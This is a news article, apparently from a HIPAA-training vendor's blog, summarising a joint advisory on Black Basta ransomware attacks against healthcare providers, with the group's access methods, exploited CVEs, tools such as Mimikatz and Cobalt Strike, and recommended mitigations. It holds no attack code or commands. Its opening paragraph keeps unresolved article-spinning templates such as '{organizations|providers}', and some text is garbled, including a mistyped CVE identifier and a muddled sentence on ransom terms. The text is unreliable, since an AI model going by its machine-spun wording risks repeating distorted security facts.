Advisory on Black Basta Ransomware Attacks on Healthcare Organizations

by | May 18, 2024

All healthcare and public health (HPH) sector {organizations|providers} received {an alert|a warning} to {apply|employ} mitigations against Black Basta ransomware attacks, {because|since} the ransomware-as-a-service (RaaS) group is attacking the HPH sector.

In 2023, Black Basta was the top 3 ransomware gang after LockBit and ALPHV/Blackcat. However, Black Basta is now in the second spot and is increasing attacks, particularly on critical infrastructure organizations. Black Basta affiliates are behind the data theft and encryption attacks carried out on 12 of the 16 critical infrastructure sectors. Recently, the group has expanded attacks on medical institutions. As per several CNN sources, Black Basta attacked Ascension which upset medical operations in 140 of its hospitals.

Black Basta initially appeared as a RaaS group in April 2022 and is believed to consist of members from the Conti ransomware group. The RaaS group is associated with the FIN7 threat actor. The group uses double extortion tactics by exfiltrating sensitive information before the files are encrypted, and then requiring a ransom payment to stop publishing the data on the group’s data leak website to give the keys for decrypting files. The group is an expert in high-impact attacks that cause substantial disruption to operations. The group states on its data leak website on Tor that its extortion earnings from victims are over $100 million after conducting more than 500 ransomware attacks around the world.

Based on the Health Information Sharing and Analysis Center (Health-ISAC), the Black Basta group attacked one healthcare provider in Europe and one in the United States last month. The two attacks resulted in massive disruption in operations. HEALTH-ISAC, the Federal Bureau of Investigation (FBI), the Department of Health and Human Services (HHS), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint cybersecurity advisory about the group. The joint cybersecurity advisory issued as part of CISA’s Stop Ransomware initiative gives information on the most recent tactics, techniques, and procedures (TTPs) employed by the group and up-to-date indicators of compromise (IoCs) discovered by the FBI from its attack investigations and third-party reports.

Black Basta employs various methods for preliminary access to victims’ systems like sending spear phishing emails to workers in targeted companies. The group is likewise seen to use credentials bought from initial access brokers, QakBot malware for preliminary access, and vulnerability exploitation. Exploited vulnerabilities by the group include NoPac (CVE-2021-42278 and CVE-2021-42287), ZeroLogon (CVE-2020-1472), and ConnectWise (CVE-2024-1708 and SVE-2024-1709).

The group uses the following tools for remote access, reconnaissance, privilege escalation, lateral movement, file execution, and data extraction: BITSAdmin, Mimikatz, Cobalt Strike, PSExec, PowerShell, SoftPerfect, Splashtop, ScreenConnect, RClone, and WinSCP. The group finds sensitive information to exfiltrate, removes shadow copies to impede recovery, and corrupts antivirus and endpoint detection software. After encrypting files, the group requires victims to pay a ransom after negotiating payment.

The advisory urges healthcare providers and other critical infrastructure entities to comply with HIPAA and cybersecurity best practices and implement mitigations against the most prevalent attack vectors. To safeguard against phishing and spear phishing, covered entities must implement advanced email security solutions that can handle the scanning and validation of URLs in email messages and have anti-malware features. Employee HIPAA training must be given to increase awareness of phishing threats and teach employees how to identify, prevent, and report phishing attacks.

Phishing-resistant multi-factor authentication must be enforced to secure accounts when credentials are exposed. Advanced anti-malware software programs must be set up on endpoints and need to be set for automatic update of signatures. Remote access software must be secured, which includes MFA. All software programs, firmware, and operating systems must use the most recent versions, with patches used immediately. Despite implementing all recommended mitigations, security breaches may still occur. It is thus necessary to regularly back up sensitive information, critical systems, and device settings to ensure quick repair and restoration in case of a successful cyberattack. Healthcare providers must also subscribe to threat intelligence services like CISA’s KEV catalog. Remediation of vulnerabilities that threat actors are actively exploiting must be prioritized.

Raise the level of HIPAA Awareness in your organization with Learner-Friendly, Comprehensive and Affordable HIPAA Training.


Please enable JavaScript in your browser to complete this form.

Ryan Coyne

Ryan Coyne is a results-driven leader in the healthcare compliance industry, specializing in regulatory compliance, compliance training, and assisting healthcare organizations and business associates in achieving and maintaining compliance. With a deep knowledge of healthcare regulations and a keen understanding of the challenges faced by the industry, Ryan has developed a reputation as a trusted advisor and advocate for ethical and compliant practices in healthcare. Ryan has successfully advised and guided numerous healthcare organizations, business associates, and healthcare professionals on achieving and maintaining compliance with regulatory training requirements. Ryan's professional focus is using his in-depth expertise and leading a world class team of subject matter experts at ComplianceJunction in regulatory compliance to help organisations navigate the complex landscape of ensuring staff adhere to healthcare regulations. You can connect with Ryan via LinkedIn and follow on Twitter

Raise the level of HIPAA Awareness in your organization with Learner-Friendly, Comprehensive and Affordable HIPAA Training.

Comprehensive HIPAA Training

Used in 1000+ Healthcare Organizations and 100+ Universities

    Full Course - Immediate Access

    Privacy Policy